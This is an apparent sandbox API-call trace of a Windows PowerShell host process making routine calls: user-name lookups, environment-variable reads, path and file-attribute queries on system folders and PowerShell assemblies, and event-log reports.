	[0146.615] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0146.615] GetUserNameW (in: lpBuffer=0x2867a0, pcbBuffer=0x1cd4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd4c8) returned 1
	[0146.615] CoTaskMemFree (pv=0x2867a0) 
	[0146.616] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dc42e0*="Variable", lpRawData=0x2dc4070) returned 1
	[0146.618] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0146.618] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.618] CoTaskMemFree (pv=0x23ecf0) 
	[0146.622] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0146.622] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0146.622] CoTaskMemFree (pv=0x23ecf0) 
	[0146.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ccd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0146.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0146.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0146.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0146.806] CoTaskMemAlloc (cb=0x804) returned 0x1b83a820
	[0146.807] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b83a820, nSize=0x1cd488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd488) returned 0x1
	[0146.922] CoTaskMemFree (pv=0x1b83a820) 
	[0146.922] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0146.922] GetUserNameW (in: lpBuffer=0x2867a0, pcbBuffer=0x1cd4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd4c8) returned 1
	[0146.922] CoTaskMemFree (pv=0x2867a0) 
	[0146.923] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dd8138*="Certificate", lpRawData=0x2dd7ec8) returned 1
	[0147.070] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0147.070] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.070] CoTaskMemFree (pv=0x23ecf0) 
	[0147.074] GetLogicalDrives () returned 0x4
	[0147.074] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1cd110, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0147.074] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0147.076] CoTaskMemAlloc (cb=0x20e) returned 0x2d1e60
	[0147.076] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2d1e60 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0147.076] CoTaskMemFree (pv=0x2d1e60) 
	[0147.079] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0147.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.079] CoTaskMemFree (pv=0x23ecf0) 
	[0147.080] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0147.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.080] CoTaskMemFree (pv=0x23ecf0) 
	[0147.100] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0147.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.101] CoTaskMemFree (pv=0x23ecf0) 
	[0147.102] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0147.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.102] CoTaskMemFree (pv=0x23ecf0) 
	[0147.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0147.103] SetErrorMode (uMode=0x1) returned 0x1
	[0147.103] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd0d0 | out: lpFileInformation=0x1cd0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0147.103] SetErrorMode (uMode=0x1) returned 0x1
	[0147.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0147.103] SetErrorMode (uMode=0x1) returned 0x1
	[0147.103] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd0d0 | out: lpFileInformation=0x1cd0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0147.103] SetErrorMode (uMode=0x1) returned 0x1
	[0147.104] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0147.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.104] CoTaskMemFree (pv=0x23ecf0) 
	[0147.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0147.108] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cce80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0147.108] SetErrorMode (uMode=0x1) returned 0x1
	[0147.108] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd090 | out: lpFileInformation=0x1cd090*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0147.108] SetErrorMode (uMode=0x1) returned 0x1
	[0147.203] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cce80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0147.203] SetErrorMode (uMode=0x1) returned 0x1
	[0147.203] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1cd090 | out: lpFileInformation=0x1cd090*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0147.204] SetErrorMode (uMode=0x1) returned 0x1
	[0147.204] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0147.204] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0147.204] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0147.204] SetErrorMode (uMode=0x1) returned 0x1
	[0147.204] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd090 | out: lpFileInformation=0x1cd090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0147.204] SetErrorMode (uMode=0x1) returned 0x1
	[0147.204] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0147.204] SetErrorMode (uMode=0x1) returned 0x1
	[0147.204] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd090 | out: lpFileInformation=0x1cd090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0147.205] SetErrorMode (uMode=0x1) returned 0x1
	[0147.205] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0147.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1ccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0147.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0147.205] SetErrorMode (uMode=0x1) returned 0x1
	[0147.205] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd090 | out: lpFileInformation=0x1cd090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0147.205] SetErrorMode (uMode=0x1) returned 0x1
	[0147.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0147.205] SetErrorMode (uMode=0x1) returned 0x1
	[0147.205] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd090 | out: lpFileInformation=0x1cd090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0147.206] SetErrorMode (uMode=0x1) returned 0x1
	[0147.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0147.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1ccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0147.206] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0147.206] SetErrorMode (uMode=0x1) returned 0x1
	[0147.206] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd0d0 | out: lpFileInformation=0x1cd0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0147.206] SetErrorMode (uMode=0x1) returned 0x1
	[0147.206] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0147.207] SetErrorMode (uMode=0x1) returned 0x1
	[0147.207] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cd0d0 | out: lpFileInformation=0x1cd0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0147.207] SetErrorMode (uMode=0x1) returned 0x1
	[0147.207] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0147.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1ccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0147.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0147.207] SetErrorMode (uMode=0x1) returned 0x1
	[0147.207] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd0d0 | out: lpFileInformation=0x1cd0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0147.207] SetErrorMode (uMode=0x1) returned 0x1
	[0147.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0147.208] SetErrorMode (uMode=0x1) returned 0x1
	[0147.208] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd0d0 | out: lpFileInformation=0x1cd0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0147.208] SetErrorMode (uMode=0x1) returned 0x1
	[0147.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0147.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1ccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0147.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cd130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0147.211] SetErrorMode (uMode=0x1) returned 0x1
	[0147.211] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd390 | out: lpFileInformation=0x1cd390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0147.211] SetErrorMode (uMode=0x1) returned 0x1
	[0147.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.387] CoTaskMemAlloc (cb=0x804) returned 0x1b83a820
	[0147.387] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b83a820, nSize=0x1cd6f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd6f8) returned 0x1
	[0147.387] CoTaskMemFree (pv=0x1b83a820) 
	[0147.388] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0147.388] GetUserNameW (in: lpBuffer=0x2867a0, pcbBuffer=0x1cd738 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd738) returned 1
	[0147.388] CoTaskMemFree (pv=0x2867a0) 
	[0147.390] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e10e20*="Available", lpRawData=0x2e10bb0) returned 1
	[0147.516] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0147.516] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.516] CoTaskMemFree (pv=0x23ecf0) 
	[0147.518] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0147.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0147.518] CoTaskMemFree (pv=0x23ecf0) 
	[0147.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.529] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0147.529] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0147.529] CoTaskMemFree (pv=0x23ecf0) 
	[0147.529] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0147.529] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0147.530] CoTaskMemFree (pv=0x23ecf0) 
	[0147.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0147.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
